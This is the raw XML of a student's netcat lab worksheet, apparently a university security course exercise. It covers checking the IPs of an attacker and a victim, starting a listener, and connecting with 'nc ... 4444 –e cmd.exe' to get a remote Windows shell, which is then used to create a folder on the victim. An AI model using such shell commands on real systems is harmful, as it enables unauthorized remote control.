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5C4" w:rsidRPr="00ED05C4" w:rsidRDefault="00ED05C4" w:rsidP="00ED05C4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ED05C4">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Lab #</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED05C4">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED05C4">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>— Assessment Worksheet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED05C4" w:rsidRPr="00ED05C4" w:rsidRDefault="00ED05C4" w:rsidP="00ED05C4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F82BAB" w:rsidRPr="000505AB" w:rsidRDefault="00F82BAB" w:rsidP="00F82BA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>IAM302</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F82BAB" w:rsidRPr="000505AB" w:rsidRDefault="00F82BAB" w:rsidP="00F82BA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F82BAB" w:rsidRPr="000505AB" w:rsidRDefault="00F82BAB" w:rsidP="00F82BA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0505A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ED05C4" w:rsidRPr="00ED05C4" w:rsidRDefault="00F82BAB" w:rsidP="00F82BAB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000505A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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Vu Duc Ly</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00ED05C4" w:rsidRDefault="00ED05C4" w:rsidP="00ED05C4">
      <w:pPr>
        <w:spacing w:line="36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ED05C4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Using Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED05C4" w:rsidRPr="00ED05C4" w:rsidRDefault="00ED05C4" w:rsidP="00ED05C4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED05C4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Che</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cking Attacker’s IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E3768" w:rsidRDefault="003C01E3" w:rsidP="00ED05C4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi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67B82914" wp14:editId="6DD1B2AE">
            <wp:extent cx="5731510" cy="3342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4" w:rsidRDefault="00ED05C4" w:rsidP="00ED05C4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED05C4" w:rsidRPr="00ED05C4" w:rsidRDefault="00ED05C4" w:rsidP="00ED05C4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 w:rsidRPr="00ED05C4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ing Victim’s IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C01E3" w:rsidRDefault="005158C2" w:rsidP="00ED05C4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi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736556C" wp14:editId="6A77C774">
            <wp:extent cx="5731510" cy="3982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C4" w:rsidRDefault="00ED05C4" w:rsidP="00ED05C4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED05C4" w:rsidRPr="006311A5" w:rsidRDefault="00ED05C4" w:rsidP="00ED05C4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 w:rsidRPr="006311A5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Check</w:t>
      </w:r>
      <w:r w:rsidR="00F9328F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="006311A5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> if </w:t>
      </w:r>
      <w:r w:rsidR="006311A5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attacker and Victim</w:t>
      </w:r>
      <w:r w:rsidRPr="006311A5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can connect to each other </w:t>
      </w:r>
      <w:r w:rsidR="006311A5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidRPr="006311A5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Ping </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005158C2" w:rsidRPr="00ED05C4" w:rsidRDefault="005158C2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102BA853" wp14:editId="75E5434D">
            <wp:extent cx="5731510" cy="3425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C2" w:rsidRDefault="005158C2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753E84A" wp14:editId="690360E2">
            <wp:extent cx="5731510" cy="4046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b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006311A5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Checking Netcat on Attacker and Victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005158C2" w:rsidRPr="00ED05C4" w:rsidRDefault="005158C2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41A89DA3" wp14:editId="7CB44064">
            <wp:extent cx="5731510" cy="33585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EE" w:rsidRDefault="00B477EE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1735CA" wp14:editId="57774ACB">
            <wp:extent cx="5731510" cy="3740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 w:rsidRPr="006311A5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>On Attacker, begin to listen on port 4444</w:t>
      </w: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sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006311A5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command: ncat –lnvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B477EE" w:rsidRDefault="00B477EE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167D215E" wp14:editId="5975E1E6">
            <wp:extent cx="5731510" cy="3344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 w:rsidRPr="006311A5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Connect</w:t>
      </w:r>
      <w:r w:rsidR="00F9328F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="006311A5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Victim</w:t>
      </w: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sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command: nc 10.1.102.84 4444 –e cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226854" w:rsidRDefault="00226854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1A680ABA" wp14:editId="247030B4">
            <wp:extent cx="5731510" cy="3985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6311A5" w:rsidRPr="006311A5" w:rsidRDefault="00F9328F" w:rsidP="006311A5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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creating</w:t>
      </w:r>
      <w:r w:rsidR="006311A5" w:rsidRPr="006311A5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> an unwanted folder</w:t>
      </w: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sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006311A5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>As you can see on the Attacker’s console. There is the standard windows prompt, and now, I will create an unwanted folder on the victim’s system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226854" w:rsidRPr="00ED05C4" w:rsidRDefault="00226854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F092687" wp14:editId="1D1811A4">
            <wp:extent cx="5731510" cy="3383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F7" w:rsidRDefault="00DD39F7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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F697926" wp14:editId="4C5985F7">
            <wp:extent cx="5731510" cy="3425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A5" w:rsidRDefault="006311A5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6311A5" w:rsidRPr="006311A5" w:rsidRDefault="006311A5" w:rsidP="00ED05C4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD39F7" w:rsidRPr="00ED05C4" w:rsidRDefault="00DD39F7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175226F" wp14:editId="25B6BDAA">
            <wp:extent cx="3629532" cy="5687219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F7" w:rsidRPr="00ED05C4" w:rsidRDefault="00DD39F7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E96E537" wp14:editId="2DE4739B">
            <wp:extent cx="5731510" cy="4842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F7" w:rsidRPr="00ED05C4" w:rsidRDefault="00DD39F7" w:rsidP="00ED05C4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED05C4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033C844" wp14:editId="4D96B311">
            <wp:extent cx="5731510" cy="4996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54" w:rsidRPr="00ED05C4" w:rsidRDefault="00226854" w:rsidP="00ED05C4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F1CF1" w:rsidRPr="00ED05C4" w:rsidRDefault="005F1CF1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5F1CF1" w:rsidRPr="00ED05C4" w:rsidRDefault="005F1CF1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5F1CF1" w:rsidRPr="00ED05C4" w:rsidRDefault="005F1CF1" w:rsidP="00ED05C4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005158C2" w:rsidRPr="00ED05C4" w:rsidRDefault="005158C2" w:rsidP="00ED05C4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="005158C2" w:rsidRPr="00ED0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4B7" w:rsidRDefault="002604B7" w:rsidP="006311A5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="002604B7" w:rsidRDefault="002604B7" w:rsidP="00631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4B7" w:rsidRDefault="002604B7" w:rsidP="006311A5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="002604B7" w:rsidRDefault="002604B7" w:rsidP="006311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1E3"/>
    <w:rsid w:val="00226854"/>
    <w:rsid w:val="002604B7"/>
    <w:rsid w:val="003C01E3"/>
    <w:rsid w:val="005158C2"/>
    <w:rsid w:val="005E3768"/>
    <w:rsid w:val="005F1CF1"/>
    <w:rsid w:val="006311A5"/>
    <w:rsid w:val="00676949"/>
    <w:rsid w:val="00813B06"/>
    <w:rsid w:val="00B477EE"/>
    <w:rsid w:val="00D05AA8"/>
    <w:rsid w:val="00DD39F7"/>
    <w:rsid w:val="00ED05C4"/>
    <w:rsid w:val="00F023CD"/>
    <w:rsid w:val="00F82BAB"/>
    <w:rsid w:val="00F9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C7C3DB5E-30B3-4242-969D-2F210454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05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31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1A5"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00631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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-11T01:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-13T17:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>